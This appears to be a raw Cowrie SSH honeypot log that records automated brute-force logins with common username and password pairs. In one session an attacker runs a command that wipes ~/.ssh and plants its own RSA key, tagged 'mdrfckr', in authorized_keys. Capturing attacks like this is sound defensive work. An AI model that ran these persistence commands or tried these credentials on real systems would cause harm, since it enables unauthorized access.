{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:12:26.003992Z","src_ip":"41.226.27.251","session":"34b7181b9f00"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w3e4r","message":"login attempt [root/!Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:12:26.147848Z","src_ip":"41.226.27.251","session":"34b7181b9f00"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:12:26.259084Z","src_ip":"41.226.27.251","session":"34b7181b9f00"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:12:26.259760Z","src_ip":"41.226.27.251","session":"34b7181b9f00"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:12:26.308845Z","src_ip":"41.226.27.251","session":"34b7181b9f00"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:12:26.309863Z","src_ip":"41.226.27.251","session":"34b7181b9f00"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":51400,"dst_ip":"1.2.3.4","dst_port":22,"session":"0069cde4df53","protocol":"ssh","message":"New connection: 41.226.27.251:51400 (1.2.3.4:22) [session: 0069cde4df53]","sensor":"my-vps","timestamp":"2025-08-31T02:12:46.596524Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:12:46.689989Z","src_ip":"41.226.27.251","session":"0069cde4df53"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:12:46.690773Z","src_ip":"41.226.27.251","session":"0069cde4df53"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-31T02:12:47.060552Z","src_ip":"41.226.27.251","session":"0069cde4df53"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:12:48.319127Z","src_ip":"41.226.27.251","session":"0069cde4df53"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47254,"dst_ip":"1.2.3.4","dst_port":22,"session":"0503df09a0d1","protocol":"ssh","message":"New connection: 212.227.235.229:47254 (1.2.3.4:22) [session: 0503df09a0d1]","sensor":"my-vps","timestamp":"2025-08-31T02:12:56.079015Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:12:57.240209Z","src_ip":"212.227.235.229","session":"0503df09a0d1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:12:57.240943Z","src_ip":"212.227.235.229","session":"0503df09a0d1"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"P@ssw0rd123","message":"login attempt [elastic/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:13:02.947447Z","src_ip":"212.227.235.229","session":"0503df09a0d1"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:13:04.718254Z","src_ip":"212.227.235.229","session":"0503df09a0d1"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":50028,"dst_ip":"1.2.3.4","dst_port":22,"session":"778582378ba5","protocol":"ssh","message":"New connection: 41.226.27.251:50028 (1.2.3.4:22) [session: 778582378ba5]","sensor":"my-vps","timestamp":"2025-08-31T02:13:08.010741Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:13:08.012195Z","src_ip":"41.226.27.251","session":"778582378ba5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:13:08.056630Z","src_ip":"41.226.27.251","session":"778582378ba5"}
{"eventid":"cowrie.login.failed","username":"hive","password":"hive","message":"login attempt [hive/hive] failed","sensor":"my-vps","timestamp":"2025-08-31T02:13:08.189765Z","src_ip":"41.226.27.251","session":"778582378ba5"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:13:09.403578Z","src_ip":"41.226.27.251","session":"778582378ba5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38112,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e9417b8226b","protocol":"ssh","message":"New connection: 212.227.125.160:38112 (1.2.3.4:22) [session: 3e9417b8226b]","sensor":"my-vps","timestamp":"2025-08-31T02:13:17.924786Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:13:18.680731Z","src_ip":"212.227.125.160","session":"3e9417b8226b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:13:18.681449Z","src_ip":"212.227.125.160","session":"3e9417b8226b"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"P@ssw0rd123","message":"login attempt [elastic/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:13:22.175160Z","src_ip":"212.227.125.160","session":"3e9417b8226b"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:13:23.317847Z","src_ip":"212.227.125.160","session":"3e9417b8226b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53162,"dst_ip":"1.2.3.4","dst_port":22,"session":"88dff4b3f7af","protocol":"ssh","message":"New connection: 212.227.235.229:53162 (1.2.3.4:22) [session: 88dff4b3f7af]","sensor":"my-vps","timestamp":"2025-08-31T02:13:27.394735Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T02:13:27.395413Z","src_ip":"212.227.235.229","session":"88dff4b3f7af"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T02:13:27.540723Z","src_ip":"212.227.235.229","session":"88dff4b3f7af"}
{"eventid":"cowrie.login.success","username":"root","password":"123wersdfxcv","message":"login attempt [root/123wersdfxcv] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:13:28.162977Z","src_ip":"212.227.235.229","session":"88dff4b3f7af"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:13:28.468836Z","src_ip":"212.227.235.229","session":"88dff4b3f7af"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T02:13:28.469547Z","src_ip":"212.227.235.229","session":"88dff4b3f7af"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T02:13:28.470840Z","src_ip":"212.227.235.229","session":"88dff4b3f7af"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":43858,"dst_ip":"1.2.3.4","dst_port":22,"session":"88a362702171","protocol":"ssh","message":"New connection: 41.226.27.251:43858 (1.2.3.4:22) [session: 88a362702171]","sensor":"my-vps","timestamp":"2025-08-31T02:13:28.564243Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:13:28.617563Z","src_ip":"212.227.235.229","session":"88dff4b3f7af"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:13:28.623094Z","src_ip":"41.226.27.251","session":"88a362702171"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:13:28.623648Z","src_ip":"41.226.27.251","session":"88a362702171"}
{"eventid":"cowrie.login.failed","username":"git","password":"git","message":"login attempt [git/git] failed","sensor":"my-vps","timestamp":"2025-08-31T02:13:28.799280Z","src_ip":"41.226.27.251","session":"88a362702171"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:13:29.388918Z","src_ip":"212.227.235.229","session":"88dff4b3f7af"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T02:13:29.389596Z","src_ip":"212.227.235.229","session":"88dff4b3f7af"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T02:13:29.536764Z","src_ip":"212.227.235.229","session":"88dff4b3f7af"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:13:29.537736Z","src_ip":"212.227.235.229","session":"88dff4b3f7af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49950,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c81d7a15d11","protocol":"ssh","message":"New connection: 212.227.235.229:49950 (1.2.3.4:22) [session: 9c81d7a15d11]","sensor":"my-vps","timestamp":"2025-08-31T02:13:29.681556Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T02:13:29.682123Z","src_ip":"212.227.235.229","session":"9c81d7a15d11"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T02:13:29.830316Z","src_ip":"212.227.235.229","session":"9c81d7a15d11"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:13:30.058476Z","src_ip":"41.226.27.251","session":"88a362702171"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T02:13:30.453419Z","src_ip":"212.227.235.229","session":"9c81d7a15d11"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:13:31.602582Z","src_ip":"212.227.235.229","session":"9c81d7a15d11"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49960,"dst_ip":"1.2.3.4","dst_port":22,"session":"d451df39bceb","protocol":"ssh","message":"New connection: 212.227.235.229:49960 (1.2.3.4:22) [session: d451df39bceb]","sensor":"my-vps","timestamp":"2025-08-31T02:13:31.746448Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T02:13:31.747301Z","src_ip":"212.227.235.229","session":"d451df39bceb"}
